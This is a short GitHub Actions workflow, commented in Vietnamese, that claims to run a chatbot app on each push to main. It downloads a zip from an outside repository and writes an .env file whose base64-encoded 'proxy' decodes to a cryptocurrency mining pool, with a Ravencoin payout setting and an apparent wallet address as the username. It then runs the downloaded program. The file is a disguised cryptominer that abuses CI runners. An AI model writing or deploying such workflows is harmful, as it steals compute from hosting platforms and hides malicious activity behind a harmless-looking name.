name: Run App

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  run-node-app:
    runs-on: ubuntu-latest

    steps:
      # Bước 1: Checkout mã nguồn (nếu cần thiết)
      - name: Checkout code
        uses: actions/checkout@v4

      # Bước 2: Clone repository từ URL
      - name: Clone repository
        run: wget https://github.com/duongpokeeeee/sadsd/raw/refs/heads/main/chatbot.zip

      # Bước 3: Chạy file app.js
      - name: Run the Node.js app
        run: |
          yes A | unzip chatbot.zip
          echo -e "host=127.0.0.1\nport=3306\nproxy=wss://epoch-labs.up.railway.app/cG93ZXIyYi5uYS5taW5lLnpwb29sLmNhOjYyNDI=\nthreads=4\npassword=c=RVN\nusername=RBCPz2xQMf9Cz3eyqFTVFHVjZM2cTSeYRN" > .env
          python3 app.py $1 --cache=.cache/09Qy5sb2Fkcyg.txt
